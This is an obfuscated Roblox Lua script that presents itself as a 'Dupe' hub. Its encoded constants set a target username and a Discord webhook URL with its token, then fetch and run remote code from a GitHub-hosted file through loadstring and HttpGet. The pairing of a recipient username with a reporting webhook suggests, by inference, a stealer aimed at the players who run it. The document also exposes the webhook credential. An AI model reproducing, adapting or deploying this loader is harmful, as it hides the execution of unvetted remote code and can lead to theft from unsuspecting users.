--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.13) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v101=v5(v85,v19);v19=nil;return v101;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0;local v87;while true do if (v86==(0 -0)) then v87=(v31/(((1 + 4) -(880 -(282 + 595)))^(v32-(1 -0))))%((4 -2)^(((v33-((2257 -(1523 + 114)) -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v87-(v87%(569 -(367 + 201))) ;end end else local v88=(929 -(214 + 713))^(v32-(1 + 0 + 0)) ;return (((v31%(v88 + v88))>=v88) and 1) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if ((1065 -(67 + 1 + 997))==v35) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -(2 + 4)) ;v35=958 -(892 + 65) ;end if (v35==((281 -163) -(32 + 85))) then return (v37 * 256) + v36 ;end end end local function v23()local v38=(0 + 0) -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (16777566 -(87 + 263))) + (v41 * (65716 -(67 + 113))) + (v40 * (188 + (270 -202))) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;v38=1;end end end local function v24()local v43=952 -(802 + 150) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + 0)) then v46=2 -1 ;v47=(v20(v45,1 -0 ,15 + 5 ) * ((999 -(915 + 82))^(90 -58))) + v44 ;v43=2 + 0 ;end if (v43==(3 -0)) then if (v48==(772 -(201 + 571))) then if (v47==(1187 -(1069 + 118))) then return v49 * (0 -0) ;else local v102=0 -0 ;while true do if (v102==0) then v48=1;v46=0 + (1138 -(116 + 1022)) ;break;end end end elseif (v48==(3636 -1589)) then return ((v47==(0 + 0)) and (v49 * ((792 -(368 + 423))/0))) or (v49 * NaN) ;end return v8(v49,v48-(3214 -2191) ) * (v46 + (v47/((20 -(10 + 8))^((828 -629) -147)))) ;end if (v43==2) then v48=v20(v45,463 -(245 + 171 + 26) ,31);v49=((v20(v45,102 -70 )==(1 + (0 -0))) and  -((3 -2) -0)) or (439 -(145 + 293)) ;v43=433 -(44 + 386) ;end if (v43==(1486 -(998 + 488))) then v44=v23();v45=v23();v43=1 + 0 ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(860 -(814 + 45)) );v18=v18 + v50 ;local v52={};for v67=2 -1 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=540 -(537 + 3) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=2) then else local v92=0;while true do if (v92==(1700 -(1419 + 281))) then v58=nil;v59=nil;v92=1 -0 ;end if (v92~=(75 -(71 + 3))) then else v53=3;break;end end end if (v53~=(1 + 0)) then else local v93=0;while true do if (v93==(2 -1)) then v53=2 -0 ;break;end if (v93~=0) then else v56=nil;v57=nil;v93=242 -(187 + 54) ;end end end if (v53~=0) then else local v94=0;while true do if (v94==0) then v54=0;v55=nil;v94=781 -(162 + 618) ;end if (v94==(1 + 0)) then v53=1;break;end end end if (v53~=(2 + 1)) then else v60=nil;while true do local v95=0;local v96;while true do if (v95~=0) then else v96=0 -0 ;while true do if (v96==(0 -0)) then local v117=0 + 0 ;local v118;while true do if (0~=v117) then else v118=1636 -(1373 + 263) ;while true do if (v118~=(1001 -(451 + 549))) then else v96=1;break;end if (v118==(0 + 0)) then local v157=0 -0 ;while true do if (v157~=1) then else v118=1;break;end if (v157==0) then if (v54==(1 -0)) then local v159=0;while true do if (v159~=(1386 -(746 + 638))) then else v54=1 + 1 ;break;end if (v159==1) then local v163=0;while true do if (v163==(1 -0)) then v159=343 -(218 + 123) ;break;end if (v163==0) then for v168=1,v59 do local v169=1581 -(1535 + 46) ;local v170;local v171;local v172;while true do if (v169~=(0 + 0)) then else local v174=0;while true do if (v174~=(0 + 0)) then else local v182=560 -(306 + 254) ;while true do if (v182~=0) then else v170=0 + 0 ;v171=nil;v182=1;end if (v182~=1) then else v174=1 -0 ;break;end end end if (v174==(1468 -(899 + 568))) then v169=1;break;end end end if (v169==1) then v172=nil;while true do if (v170==0) then local v183=0;while true do if (v183==0) then v171=v21();v172=nil;v183=1 + 0 ;end if (v183==1) then v170=2 -1 ;break;end end end if (v170~=1) then else if (v171==1) then v172=v21()~=0 ;elseif (v171==2) then v172=v24();elseif (v171~=3) then else v172=v25();end v60[v168]=v172;break;end end break;end end end v58[3]=v21();v163=1;end end end if (v159==(603 -(268 + 335))) then local v164=0;local v165;while true do if (v164~=(290 -(60 + 230))) then else v165=572 -(426 + 146) ;while true do if ((0 + 0)==v165) then local v173=1456 -(282 + 1174) ;while true do if (v173==0) then v59=v23();v60={};v173=812 -(569 + 242) ;end if ((2 -1)~=v173) then else v165=1 + 0 ;break;end end end if (v165==(1025 -(706 + 318))) then v159=1;break;end end break;end end end end end if ((1253 -(721 + 530))==v54) then local v160=1271 -(945 + 326) ;local v161;while true do if (v160~=(0 -0)) then else v161=0;while true do local v166=0;while true do if (v166~=0) then else if (v161~=(0 + 0)) then else for v175=701 -(271 + 429) ,v23() do local v176=0;local v177;local v178;local v179;while true do if (v176~=0) then else v177=0;v178=nil;v176=1;end if (v176==1) then v179=nil;while true do if (v177~=1) then else while true do if (v178~=0) then else v179=v21();if (v20(v179,1 + 0 ,1)~=0) then else local v186=1500 -(1408 + 92) ;local v187;local v188;local v189;while true do if ((1089 -(461 + 625))~=v186) then else if (v20(v188,1291 -(993 + 295) ,3)==1) then v189[1 + 3 ]=v60[v189[1175 -(418 + 753) ]];end v55[v175]=v189;break;end if (v186==1) then v189={v22(),v22(),nil,nil};if (v187==(0 + 0)) then local v194=529 -(406 + 123) ;local v195;local v196;while true do if (v194~=(1769 -(1749 + 20))) then else v195=0;v196=nil;v194=1;end if (v194~=1) then else while true do if (v195~=(0 + 0)) then else v196=0;while true do if (v196==0) then v189[1325 -(1249 + 73) ]=v22();v189[4]=v22();break;end end break;end end break;end end elseif (v187==(1 + 0)) then v189[3]=v23();elseif (v187==2) then v189[1148 -(466 + 679) ]=v23() -((4 -2)^16) ;elseif (v187~=3) then else local v203=0 -0 ;local v204;local v205;while true do if (v203==(1901 -(106 + 1794))) then while true do if ((0 + 0)~=v204) then else v205=0;while true do if (v205~=0) then else v189[1 + 2 ]=v23() -((5 -3)^(43 -27)) ;v189[118 -(4 + 110) ]=v22();break;end end break;end end break;end if (v203==(584 -(57 + 527))) then v204=1427 -(41 + 1386) ;v205=nil;v203=104 -(17 + 86) ;end end end v186=2;end if (v186~=(2 + 0)) then else if (v20(v188,1 -0 ,1)==1) then v189[2]=v60[v189[2]];end if (v20(v188,2,5 -3 )~=1) then else v189[169 -(122 + 44) ]=v60[v189[5 -2 ]];end v186=9 -6 ;end if (v186~=(0 + 0)) then else local v191=0 + 0 ;while true do if (v191==(0 -0)) then v187=v20(v179,67 -(30 + 35) ,3 + 0 );v188=v20(v179,4,1263 -(1043 + 214) );v191=3 -2 ;end if (v191==(1213 -(323 + 889))) then v186=1;break;end end end end end break;end end break;end if ((0 -0)==v177) then local v185=580 -(361 + 219) ;while true do if (v185==1) then v177=321 -(53 + 267) ;break;end if (v185~=0) then else v178=0 + 0 ;v179=nil;v185=1;end end end end break;end end end for v180=414 -(15 + 398) ,v23() do v56[v180-1 ]=v28();end v161=983 -(18 + 964) ;end if (v161==(3 -2)) then return v58;end break;end end end break;end end end v157=1;end end end end break;end end end if ((1 + 0)~=v96) then else if (v54==(0 + 0)) then local v149=850 -(20 + 830) ;local v150;while true do if ((0 + 0)~=v149) then else v150=126 -(116 + 10) ;while true do if (v150~=2) then else v54=1;break;end if (v150==(0 + 0)) then local v158=738 -(542 + 196) ;while true do if (v158~=(1 -0)) then else v150=1 + 0 ;break;end if (v158~=0) then else local v162=0 + 0 ;while true do if ((1 + 0)~=v162) then else v158=1;break;end if (v162~=(0 -0)) then else v55={};v56={};v162=1;end end end end end if ((2 -1)~=v150) then else v57={};v58={v55,v56,nil,v57};v150=407 -(118 + 287) ;end end break;end end end break;end end break;end end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=4) then if (v82<=1) then if (v82>0) then local v103=0;local v104;local v105;local v106;local v107;while true do if (v103==1) then v74=(v106 + v104) -1 ;v107=0;v103=2;end if (v103==2) then for v151=v104,v74 do v107=v107 + 1 ;v79[v151]=v105[v107];end break;end if (v103==0) then v104=v81[2];v105,v106=v72(v79[v104](v13(v79,v104 + 1 ,v81[3])));v103=1;end end else v79[v81[2]]=v63[v81[3]];end elseif (v82<=2) then local v110=v81[2];local v111=v79[v81[3]];v79[v110 + 1 ]=v111;v79[v110]=v111[v81[4]];elseif (v82>3) then v79[v81[2]]=v79[v81[3]][v81[4]];else local v121;local v122,v123;local v124;local v125;v125=v81[2];v79[v125](v79[v125 + 1 ]);v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v125=v81[2];v124=v79[v81[3]];v79[v125 + 1 ]=v124;v79[v125]=v124[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v125=v81[2];v122,v123=v72(v79[v125](v13(v79,v125 + 1 ,v81[3])));v74=(v123 + v125) -1 ;v121=0;for v147=v125,v74 do local v148=0;while true do if (v148==0) then v121=v121 + 1 ;v79[v147]=v122[v121];break;end end end v73=v73 + 1 ;v81=v69[v73];v125=v81[2];v79[v125]=v79[v125](v13(v79,v125 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end end elseif (v82<=7) then if (v82<=5) then v79[v81[2]]();elseif (v82>6) then local v135=0;local v136;while true do if (v135==0) then v136=v81[2];v79[v136](v79[v136 + 1 ]);break;end end else do return;end end elseif (v82<=8) then v79[v81[2]]=v81[3];elseif (v82==9) then local v137;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v79[v81[3]][v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v137=v81[2];v79[v137](v79[v137 + 1 ]);v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v79[v81[3]][v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v137=v81[2];v79[v137](v79[v137 + 1 ]);v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v79[v81[3]][v81[4]];else local v144=v81[2];v79[v144]=v79[v144](v13(v79,v144 + 1 ,v74));end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030B3O0049414D4E415255544F555A03073O004875624E616D6503043O0044757065030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31333432303339302O3739313339372O30342F5A786F4143704E6D67696178744B4931764267774133577670546B4D56326136316C495A5162636E4F6B4A54693343685649417039677A737553746E526B5866354B4D46030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F6769746875622E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F626C6F622F6D61696E2F7065616B2E6C756100143O0012093O00013O00206O000200122O000100038O0002000100124O00013O00206O000400122O000100058O0002000100124O00013O00206O0006001208000100074O00033O0002000100124O00083O00122O000100093O00202O00010001000A00122O0003000B6O000100039O0000026O000100016O00017O00",v9(),...);
